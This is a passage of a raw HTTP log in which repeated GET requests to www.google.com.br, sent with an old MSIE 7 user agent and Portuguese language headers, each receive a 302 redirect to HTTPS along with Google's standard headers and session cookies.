'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:49 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eNgi9FHeMvhj2ZbhmLMRnbVMnTyr9zSRWGkD0MLJjHGcy4cRtpCXU; expires=Tue\n 05-Aug-2025 09:12:49 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=NkYEviQ5WZa0XZ_VXYHxXpfNuT5yg06hCqz43_B4CV2kfLqhyTxfSpOe076nwaCHQrcOj2VY9rvNZGXrlLuHddyxbUdOrxL5Bl3zqt40IFSG4Oz7ECTLgLhSVGIEGstz2SVvwyrXEdd_ojCC8DM8xJ_ZtILcwcm3MbRr5rlgnCaKO7_5yD6_dwuGWLAV0Qlojy3HteEJV87enw; expires=Fri\n 08-Aug-2025 09:12:49 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-n2BokBXwh0VECuNMYDa5-g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:50 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eOknoDEniY1kmbEXjiVxM5MvrOh-YKoUGkqifeEn_2YXi7Nfi63yo; expires=Tue\n 05-Aug-2025 09:12:50 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=RmcJvNvGT2_-MVkXjHx5KN1bc5UrpKnoRTL1GpNium3XnmRF94n_WwKFNl17jJzmYeiUbIvN8PqP39eJ392UvMxIHQHQokaqfham6Mdp5z3oB8J9LqEC0LEbjvRabEjCXQWgbFpyvr7rIafMqBWZzHITy__w1z-M7QHKzYPCExCjSHAAXV6obmuMYmuJG-tCrpLcA5962xXSVtk; expires=Fri\n 08-Aug-2025 09:12:50 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-bWFKKnhclday-aNsljt3tA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:50 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fWZDDMZEKyTgHJb0d3E9XyunhsrAPcdTD16d8_n21thDwTC7Iw0qw; expires=Tue\n 05-Aug-2025 09:12:50 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=SuVzD7-K9erzP5i8a7Vhx2xg4zdLHNrt4iJ0b6oQnVrRH0LQpkiiRnl67G2Hh9VB9Ik4nJKoCUM4JZ7fcU13YMg71AkvWZWPVGKUS_LCjn-IZxvNQuvEvileQtr3zVCrPgjoXd33oLe-Mwuxde-ASpVezDChQb6KADFY2Hg481QeLW8PTR_f-7Y8txrW8emVjmbsIGP08W1VOg; expires=Fri\n 08-Aug-2025 09:12:50 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Xor2zarkzH-XF_0tXUu_Qw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:51 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fYvti_PyG9rhExRbUvO1fwzVc8PmJ_u5g7qQ2veAXosKiuiRjqf5Y; expires=Tue\n 05-Aug-2025 09:12:51 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=L96_qgpnryg9IqY7cs2WRO7dw4KIIWE-qTL1wbWBA6mfhow6WxNOtIA4gEdRqbL3u2z1KNJ0CRPf-xRQxDAGx10B6_2MIms6Gqj_pfmA9I15kUa9rw_R0Q16ej6tHrMtPJ5yWie8M_JctqoSOvHj_rPvQ1feKd3jbS74wjrfCeeaH6myt0HAVJERc_R9feF26ubD7fVPfB-3WyQ; expires=Fri\n 08-Aug-2025 09:12:51 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-nCxW85VU9oAcRxe-mLtIwQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:51 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2c-SEn3adMOZID1xDaSl0sx7EH3LOoRuXbAgks6R2w-tAU82TudJA; expires=Tue\n 05-Aug-2025 09:12:51 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=SVZYt4a87V3ofxwvAou8Q7aI9wCxK7gRheDWjEswxbytt9Ir2uSjd57OFmwgAsLwzYdhMbWcCGRUMgA-AcTyAdNuatmCMwYULxL89BOX5ppty8m5bCQYBDbih_Pal6j3znecB8pJSc_ofkz1sLejMPqvUff1tizjf6An1pg_k72KbJS-yUHpkVxyznoGqkwaMAmT5Oc2EmBlWg; expires=Fri\n 08-Aug-2025 09:12:51 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-tIwULTMnC2mIXcWlFiEkDw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:52 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dUz9PcFxBZAZZzqY3g19YYf8UUGM9j7HTzVZlhxLHGleOQwB9Ow5I; expires=Tue\n 05-Aug-2025 09:12:52 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=s141BP2T1hg-9vyuAWo8bfx_8XlR_NR4O2krCWjpPtOxgbLhWPiL6yyqfboSUTNJBx9OtGODRgzrewPEKitBTWRAIOjklJz1HZ-DUA2L9z5wFSfunbUR6WQ0aoGIZGkexZTvOUsYuG9yQqXMCCk5ff0EPHMv0oBKwVkfOpOYhCuv4DZVhjFhDywU9wlttMDRVW_MlcTEYrPYqQ; expires=Fri\n 08-Aug-2025 09:12:52 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-zr-0d7jB7fDQ7TkD9yLjRQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:52 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2d2gdHBdhuRY3DtpNoVDX33eWWn5LcdF47zoNesEyEs3lPHZBMyZA; expires=Tue\n 05-Aug-2025 09:12:52 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=hq-_fnR9mHmTH2Xvb9Gpfvi1Kczb1s9AHxqNCBKg0ENFIMKz0qjAXEoL2fKe1y0EFb8u0Q6NhplXJG23_In5Wp-5r4h-ClzX8gh3CUhM2X6LMiXPpy_VygtwZbyTvjAdzZ2yl_MEx_uCpZdw6kqt2lDKxFzEO0mMhBWr7LJOLirN3jVFllsVe2U2-UDl0brNDcqTz3UiJswW2kA; expires=Fri\n 08-Aug-2025 09:12:52 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-v8ACSNgETzRGPCNBYY64YA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:53 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e57SbdAcIq1onUVkT2OxTuUZWLtxnILsyyh3FB19Xuxs1OCXaZQg; expires=Tue\n 05-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Hf0ZPdvwdZQRpked2i98HYCWDTiMSgqO_BfQNwYDeOBH3jxwlz2Wyedzad8nGpKc0lQvpd86QJbEyM3JHj6B6bzvh3a2hj-fexoxfniyfg0RpjmRZWFdZoa5JXNusiy98qFn0I_fUFJWrSzd8p8zvO1pCFMQD8kluxG3CrTUZHcQLo9wrYTejD1N_QQsCSbSqcPlaKzw5NpR2jY; expires=Fri\n 08-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-JyH9jlgg35-9p09AtT9hWQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:53 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fmK1lrnyt1DVeGmrrfpbEXRxUggcPXqH5oDxz7KW1RD0u21j6Pagw; expires=Tue\n 05-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=mIUoioQQwDnaeY6AUONjvtCFRfDwsZgWw6a4UBwzQ8plQkwsER780IjRHSiiywLyxXYVbySU43br7QJywn2T9PeeL36h8cO-cVqCIuUKg-gCC1jgA0fYiO47_kC9CHEFMWZ3j-WZklAcrJ2K32HFowS0Wm6Bgd8UpFLfIGs3xGxwGawO4byQ7u3awrH9cSLcrUxqrxVkXeKSgZA; expires=Fri\n 08-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-m94U1o5OknPixdH4-LKGyg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:53 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2cV2P-SkspbCVAWz9IKoWRFxQwXABkxw_9yFOC_UJ3qi59tw_jPkc4; expires=Tue\n 05-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=sFdecaAVuLBi2lI-lLfZQeoUH_127fJGgPnGFFRlCV88zMeb5Hlh1HcfYE4EOmHiEISB3AsDUUuuQHedePJxiQ_lIul9L58_h9zvAkoO9JzamiYT5jh4wkXzw7LvEl1Wf-ckH0d0IGxqbq7zjipAQ6shlu7mClmU4p9o2FApHZVgZuMATrUm9LBQGJtDNrcVeZNIA3GJUIS7nw; expires=Fri\n 08-Aug-2025 09:12:53 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-P9fVY9zqGk_K9We8WElYSw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:54 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2df0VpMC71Jprow9RChUrJFQvG7WNcd2vv3muR6ou8eLOdfeXRF9Fg; expires=Tue\n 05-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=vu8q1lE47u4kk9ng1unSgRFOs4vskD9IkreU2NPVaUZCLvNo65PCRaXxbnFiO72h-wnVoxxefw_jFC8p2TsAfv1AOSot36ARPBk6xf2EdpVOuP17HXVebeVAzA1Ll8YoQs5EBB3_kRjrB3mtOXfGJ0mBB5GcvZbLWlKv_PakbvAYW8FoFchoaatczxvmjB_xL9BB_OZBh-sFEw; expires=Fri\n 08-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-F6S14SpkGTQfJg5PF53xVg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:54 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eQS-FCi-eKw9ssKtPlUrvO1ObeXy2Mv4D03eLGcJyKVSYhBal4oW8; expires=Tue\n 05-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=ssCTlJOOk57CwtdA3zdCkmpaRPgU3wIGrPIxjz0-4T-qmE0ZZZj_iGlyDarCmquuvDXO_MXouuS0Msx67q4ZNsC1FTsSASr_2oz2A4F2KytNF-UsjglisMdaSX0cNcx1-eU6y4W_xM08GBkxIvKHvGkgTMail_U2LVaqUMQ8yJbxCpnaiqcUGRq7uElVMxi6MmE-aqoTPBNuPRw; expires=Fri\n 08-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9EvcVMXRA-AzAUgMclTv3g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:55 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eyf8flLsvGgRp9mpmcmIhxZIHbCOp_jRuxBidPLEkUoLWFbqdGpNU; expires=Tue\n 05-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=BZY5wd41cskDy8rPOSPRD0EwkCfxlCJrJZahYB31rkcK4tXKU_9n7w-dLl_z1Ax-dIsScQyo61bwsgblGNJnDQDCYdPlmmUJQ6LRxuJlDEY3ddTrnNhHgX8gDm8PST9RnGobZqzCx68vXw474esX7NaPgXT5CALbX8FqabWeyVVn1Vx5-Ov7Z4gAu89O1xG3It_Kgn_4Fq1EDlg; expires=Fri\n 08-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-3jzHdfGFCgmmZZItTiHByQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:55 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2fowU48lXJWUXWi07s6Kf8tF1dcMUu1epmtJghMcwp7FHOOQtaAfi8; expires=Tue\n 05-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=Jh_NHd49QNdRP3zRNYOXSAbJuZxv-mo1wWVU4th8QYr8N5LRkLG71JlcyM4iM3AOTjs_NTdMcTSSkd551bNwPdn2zwnwA3tFHv08XW8PAsfC5yn-KVykiN_xxCPGu2SFhfkTX4CL9y9d54I6jJAo28cuq7XW9pDLVQDwpLY08cl_FnmYmT9LjJ84bvi0n2esKTaAbWTnZNmlhM0; expires=Fri\n 08-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-KE4MGmNxMIrFii3oiiB9gQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:56 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2filaRM_sEULPSIasE-qqujNwN-371HQVHsb56iuavZlIyzjXUAYT0; expires=Tue\n 05-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=wRBfmwGja4GVpL3loTZbnTnAXWys9bAEMCBx37jisRixNc_X13b5KXou3pOSj-CEAXaZf3kbIKdFqiSUL0j5X6s4mniWiB8OqLhn0u-IqWwfRzCPjIc0AHS5nRvwM0TmKAI1eKdmOdHQuSUfmYHMUcgevCHKwIwGhqAsjPWffNpFs3hydPccL-3cyJL0UyabtEJA2nZVqSvWpB4; expires=Fri\n 08-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: 